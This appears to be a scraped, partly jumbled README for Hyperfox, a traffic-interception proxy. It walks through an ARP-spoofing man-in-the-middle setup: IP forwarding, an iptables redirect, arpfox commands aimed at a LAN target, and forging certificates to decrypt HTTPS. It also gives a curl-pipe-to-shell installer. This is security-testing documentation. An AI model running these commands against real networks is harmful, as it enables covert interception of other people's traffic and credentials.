Hyperfox is capable of forging SSL certificates on the fly if you provide it with a root CA certificate and its corresponding key. If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully decrypted, intercepted and recorded.
This is the development repository, check out the https://hyperfox.org site for usage information.
You can install hyperfox to
/usr/local/binwith the following command (requires admin privileges):
You can also grab the latest release from our releases page and install it manually into another location.
curl -sL 'https://raw.githubusercontent.com/malfunkt/hyperfox/master/install.sh' | sh
Build it yourself
In order to build
hyperfoxyou'll need Go and a C compiler:
go install github.com/malfunkt/hyperfox
Running hyperfox and arpfox on Linux
The following example assumes that Hyperfox is installed on a Linux box (host) on which you have root access or sudo privileges and that the target machine is connected on the same LAN as the host.
We are going to use the arpfox tool to alter the ARP table of the target machine in order to make it redirect its traffic to Hyperfox instead of to the legitimate LAN gateway. This is an ancient technique known as ARP spoofing.
First, identify both the local IP of the legitimate gateway and its matching network interface.
The interface in our example is called
# Kernel IP routing table
# Destination Gateway Genmask Flags Metric Ref Use Iface
# default 10.0.0.1 0.0.0.0 UG 1024 0 0 wlan0
wlan0and the interface's gateway is
Then identify the IP address of the target, let's suppose it is
Enable IP forwarding on the host for it to act (temporarily) as a common router.
sudo sysctl -w net.ipv4.ip_forward=1
iptablesrule on the host to instruct it to redirect all traffic that goes to port 80 (commonly HTTP) to a local port where Hyperfox is listening to (1080).
We're almost ready, prepare Hyperfox to receive plain HTTP traffic:
sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp --destination-port 80 -j REDIRECT --to-port 1080
# 2014/12/31 07:53:29 Listening for incoming HTTP client requests on 0.0.0.0:1080.
arpfoxto alter the target's ARP table so it starts sending its network traffic to the host box:
and watch the live traffic coming in.
sudo arpfox -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET $HYPERFOX_GW